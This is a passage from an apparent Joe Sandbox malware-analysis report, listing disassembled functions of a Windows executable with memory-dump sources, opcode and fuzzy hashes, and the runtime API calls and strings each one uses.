                                                                                        • Opcode ID: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                        • Instruction ID: 9775a8374be28d52ade21f6d275c0b587e12a78b82a6dff515f1f4d25581e1a5
                                                                                        • Opcode Fuzzy Hash: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                        • Instruction Fuzzy Hash: 83316F32F14A0584EB01DB6AE4841BC2771FBE8B98F140231EE6D977E9EE38E045C344
                                                                                        Function 00007FF6FE1AFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction ID: 59fe77b2c3f80574b156fdb07d595aa7717d691807250185b9b5282ff6b33e81
                                                                                        • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction Fuzzy Hash: A121C721D49E4780FB11CB1AF8441B56BA1BBE9B84F540536F96DC7AA0EE7CE598C340
                                                                                        Function 00007FF6FE1BBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction ID: c294e7460a81135d88cb1f8ed47aecf03f74b10179ccb13ec7c3d4eb2a6c8700
                                                                                        • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction Fuzzy Hash: 1FF04F65F19A8281EF44CB16E4902B96BA0AFD8B90F441035F96FC67A4EE3CE485C701
                                                                                        Function 00007FF6FE1C45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction ID: a6c0e886ad960f00975ef6fdcc5f295759abff38f9d90d640d9d8c3e5e293f76
                                                                                        • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction Fuzzy Hash: 3581AD22F1C65285F710DB6A98406FD2EA4BBE5B88F044135ED2ED3AD5EF3CA4A1C700
                                                                                        Function 00007FF6FE193AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2398171386-0
                                                                                        • Opcode ID: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                                                                                        • Instruction ID: 0726182a5c21a7d772d3e61e39df9c0ca52ac2f1d1b5a33d633d3f3430df804f
                                                                                        • Opcode Fuzzy Hash: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                                                                                        • Instruction Fuzzy Hash: D4519262F14A4259FB50CB66E8442BD6BB1BBE87A8F404635EE2DC77D8EE389455C300
                                                                                        Function 00007FF6FE1C3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3659116390-0
                                                                                        • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                        • Instruction ID: 46d92527c869bb15e92cd3b16aa59d6cc49e66b5fdaa366e8f3f9282b9a6f7ba
                                                                                        • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                        • Instruction Fuzzy Hash: 44518F32F18A5185E710CB6AD4443ED7BB1BBA8798F048135EE5E97A98EF38E156C700
                                                                                        Function 00007FF6FE1B1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                        • Instruction ID: 6c6e3ddcd5fd53b680b087ddd745aea5c36fba74efe3550d41c17d4d1fc9dd86
                                                                                        • Opcode Fuzzy Hash: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                        • Instruction Fuzzy Hash: 5F41C021F0964689FB14DF2794402B92A91EFA8BA8F154636FA7DC7BD5EF3CE1418300
                                                                                        Function 00007FF6FE1BF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction ID: 97dc526d5362932d3f1aafbdfdd23739820beed5914e92b97994abafc17c48f0
                                                                                        • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction Fuzzy Hash: 49418062F09A4281FB25DF17A8046766A96BBA8B90F194535ED3ECB7C4FE3CE440C300
                                                                                        Function 00007FF6FE1C56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction ID: 298c8e9bfab06b0713efa80dc6e257825d81d94e654d9ac11445185202402db5
                                                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction Fuzzy Hash: 82116D76F18B0781F754912EE5463F91941BFF53A0E884234FA7ECA6D6BE2CA4C04205
                                                                                        Function 00007FF6FE1AFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                        • String ID:
                                                                                        • API String ID: 3621893840-0
                                                                                        • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                        • Instruction ID: ae87fd68a75ee72884571eb809a0e94011dd11e526a44000cbebd07b2fb08fda
                                                                                        • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                        • Instruction Fuzzy Hash: AFF0FF21F2894682F750D722E895A762651FFF4B05F441430F55EC19D4AE2CE589CB01
                                                                                        Function 00007FF6FE1B625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: __except_validate_context_recordabort
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 746414643-3733052814
                                                                                        • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                        • Instruction ID: fb8f50a45f59ecbf5d7bdc35105d5bb87fb3e267df9febfb0ef6e0f1aa567481
                                                                                        • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                        • Instruction Fuzzy Hash: B371A072E08A9186D760CF26945077D7FA0EBA5B88F148135EA5C8BBC9EF3CD495C740
                                                                                        Function 00007FF6FE1B80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: $*
                                                                                        • API String ID: 3215553584-3982473090
                                                                                        • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                        • Instruction ID: c2b24b8356bc50ec0873c24eb6cfebf5210a86abc8c716a4bfe2840e73f44ea9
                                                                                        • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                        • Instruction Fuzzy Hash: 93516072D1DA428AE768CE2A844537C3FA0FBA5F18F181175E66A813D9EF3CE481C605
                                                                                        Function 00007FF6FE1C1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$StringType
                                                                                        • String ID: $%s
                                                                                        • API String ID: 3586891840-3791308623
                                                                                        • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                        • Instruction ID: 20afcdede170eb952a539786318fc66027baccefac4cfb52f9a080ac33a41d98
                                                                                        • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                        • Instruction Fuzzy Hash: 36418722F5978145FB61CF2AD8002E966A1FBA4BA8F444636EE2DC77C5EF3CE4458300
                                                                                        Function 00007FF6FE1B66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                        • String ID: csm
                                                                                        • API String ID: 2466640111-1018135373
                                                                                        • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                        • Instruction ID: 221f4ebd8f719c965ff71bb06d031f5c3a3508714e724436d277089381a3d905
                                                                                        • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                        • Instruction Fuzzy Hash: 1A513B76E1974186D720EB57E04126E7BA4FBD9B90F140534EB9D87B96EF38E4A0CB00
                                                                                        Function 00007FF6FE1C4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                        • String ID: U
                                                                                        • API String ID: 2456169464-4171548499
                                                                                        • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                        • Instruction ID: 242132a72db69a8d8fd46edf2ada8c202bc538cfc2a0e79451a2fa27bab4f776
                                                                                        • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                        • Instruction Fuzzy Hash: 6D419122B18A8182EB20CF2AE4443A96B61FBE8794F544131FE5DC7B94EF7CD455C740
                                                                                        Function 00007FF6FE1A90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1429681911-3916222277
                                                                                        • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                        • Instruction ID: 83a1bb13cd6ec3d429e49c06f9a24805d6eca3c7012849bdd716dd94d04b790a
                                                                                        • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                        • Instruction Fuzzy Hash: F7310A35B08B4286DB08DF13BC1862A7B61F799BD1F404435FD5A83B98DE7CE4498B00
                                                                                        Function 00007FF6FE19E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8BB
                                                                                        • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8CB
                                                                                        • CreateEventW.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
